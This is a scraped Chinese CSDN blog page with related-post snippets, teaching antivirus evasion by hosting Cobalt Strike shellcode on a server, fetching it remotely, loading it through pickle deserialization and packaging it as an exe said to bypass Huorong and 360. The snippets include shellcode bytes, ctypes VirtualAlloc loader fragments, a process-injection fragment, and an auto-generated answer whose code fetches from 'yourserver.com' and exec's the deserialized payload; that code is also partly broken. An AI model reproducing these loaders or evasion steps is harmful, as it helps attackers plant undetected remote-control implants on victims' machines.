Python远程加载分离、反序列化免杀

最新推荐文章于 2024-06-02 19:43:12 发布
最新推荐文章于 2024-06-02 19:43:12 发布
阅读量1.7k 收藏 3
点赞数
文章标签: python 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43606723/article/details/126349149
版权

01思路

1、CS生成python x64 shellcode ->payload.py
2、将payload.py中shellcode进行base64编码,放至服务器保存为shellcode_bs64.txt,并开启python http服务
3、编写shellcode.py,向服务器发送请求读取payload.txt,进行序列化并base64编码
4、编写exp.py进行反序列化,加载恶意shellcode
5、打包exe,可过火绒、360

02具体操作

CobaltStrike生成payload

图片

base64编码,放至服务器

图片

服务器开启python http服务

图片

shellcode.py远程加载shellcode_bs64.txt,bs64解码后将shellcode填入加载器,将代码中请求地址改为服务器地址+端口+路径;
将带shellcode的加载器序列化再base64编码输出

import pickle
import base64

shellcode = """
import ctypes
最低0.47元/天 解锁文章
小K安全
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
通过Python实现Payload分离免杀过程详解
01-19
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66 \x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x
红队必备技能-免杀
04-02
本套视频教程将通过远控工具介绍、基础原理讲解、免杀工具分析、实战四个模块内容,对免杀技术进行全面剖析讲解! 学完本课程可以免杀市面上%90的杀软,帮助大家对免杀技术有一个清晰的认知,能够掌握常用的免杀工具和进阶思路。
python加载shellcode免杀
最新发布
qq_47289634的博客
06-02 78
以上涉及的代码可以使用Python打包成exe,然后再在Windows系统中执行。这段代码有很多优点,代码里面注释很清楚,每一步都有详细的解释,可随意扩展自己的思路。这两个不管使用哪一个,在PyCharm中运行这段代码都会,上线到CS。下面将介绍1种从远程服务器上加载share code进行上线的方法。复制编码后的结果,保存为1.txt,并把它放到自己的服务器上。上面的代码没有做任何防护,很容易就被杀毒软件识别出来。把1.txt的地址放到下面代码里面,之后运行这段代码。运行之后,依旧可以直接上线CS。
Win32下ShellCode的远程加载
CSDN
05-28 4911
如下Python代码是一个基本的键盘记录器,它使用了一些Windows API函数和第三方库来监视键盘活动,并记录按键、窗口切换和剪贴板操作。然后,它检测按键是否为常规按键,如果是,则输出按键字符。如果按下的是Ctrl+V,它会尝试获取剪贴板的内容并输出。函数是一个回调函数,用于处理键盘事件。它首先检测是否切换了窗口,如果切换了窗口,就调用。最后,它输出进程相关的信息。接下来,代码定义了一些全局变量和函数,包括。函数用于获取当前前台窗口的进程信息,以及。首先,代码导入了一些必要的库,包括。
免杀专题 (三)对loader进行远程加载
weixin_47224111的博客
12-30 1117
免杀专题 (三)对loader进行远程加载 上一篇写到的loader被各种杀软乱杀 import ctypes #shellcode加载 def shellCodeLoad(shellcode): ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
免杀分离免杀python
zhangshuaiijie的博客
06-28 685
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode的加载器,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode。
python反序列化-分离免杀1
08-03
在本文中,我们将深入探讨如何利用 Python 反序列化进行免杀技术,特别是“分离免杀”策略。 免杀技术的主要目标是让恶意代码避开安全软件的检测,从而在目标系统上成功执行。常见的免杀方法包括修改特征码、使用花...
浅析Python 序列化与反序列化
09-16
主要介绍了Python 序列化与反序列化的相关资料,文中讲解非常细致,代码帮助大家更好的理解和学习,感兴趣的朋友可以了解下
Python序列化与反序列化pickle用法实例
09-18
Python的序列化与反序列化是编程中常用的技术,它允许我们将程序中的对象转换为可存储或传输的数据格式,然后再将这些数据恢复为原始对象。序列化常用于持久化数据,比如保存用户会话、缓存计算结果或者跨进程传递...
Python中shelve序列化与反序列化
12-22
序列化/反序列化 将对象转换为可通过网络传输或可以存储到本地磁盘的数据格式(如:XML、JSON或特定格式的字节串)的过程称为序列化;反之,则称为反序列化 shelve shelve是一个简单的数据存储方案,类似key-value...
老生常谈Python序列化和反序列化
09-21
下面小编就为大家带来一篇老生常谈Python序列化和反序列化。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
笔记:ShellCode 远程线程注入
喜欢唱,rap,篮球的程序员
09-19 458
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
python免杀基础——三步(查杀、连接、代码)情况
渗透测试
11-14 1851
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)以上是使用windowAPI进行加载shellcode,先声明,在申请内存,给权限,创建线程。调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;本次使用msf生成的shellcode。本次使用msf生成的shellcode。连接和上次一样,秒连。
C/C++ 远程ShellCode执行工具
CSDN
07-21 9694
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被杀概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
免杀简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)
热门推荐
Shanfenglan's blog
08-09 33万+
二次编译 也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查杀,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码: #include stdio.h #define KEY 0x97 //进行异或的字符unsigned char
动态加载 ShellCode绕过杀软
CSDN
08-11 5077
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。
加载shellcode到32位Windows程序远程进程中
微码信息
11-16 212
BOOL WINAPI LoadDll(HANDLE hProcess,LPVOID lpBuf,int cbBuf) { BOOL br = FALSE; LPVOID m_lpData = VirtualAllocEx(hProcess, NULL,cbBuf,MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (m_lpData==NULL) { goto cleanup0; } if(!WriteProcessMemory(hProcess,
Python-shellcode免杀分离
m0_63917373的博客
06-01 2687
shellcode免杀
Python反序列化免杀执行代码
12-07
为了Python反序列化免杀执行代码,可以使用以下步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列化并进行base64编码。 4. 编写exp.py文件进行反序列化加载恶意shellcode。 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。 以下是具体操作步骤: 1. 生成Python x64 shellcode,并将其放入payload.py文件中。 2. 对shellcode进行base64编码,并将其保存在服务器上的shellcode_bs64.txt文件中。 3. 编写shellcode.py文件,向服务器发送请求以读取payload.txt文件,对其进行序列化并进行base64编码。 ```python import requests import base64 url = 'http://yourserver.com/shellcode_bs64.txt' response = requests.get(url) shellcode = response.content # 对shellcode进行反序列化并进行base64编码 serialized = base64.b64encode(pickle.dumps(shellcode)).decode('utf-8') ``` 4. 编写exp.py文件进行反序列化加载恶意shellcode。 ```python import requests import base64 import pickle url = 'http://yourserver.com/shellcode.py' response = requests.get(url) serialized = response.content # 对序列化的数据进行反序列化 data = pickle.loads(base64.b64decode(serialized)) # 加载恶意shellcode exec(data) ``` 5. 打包exe文件,以便绕过火绒、360等杀毒软件的检测。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值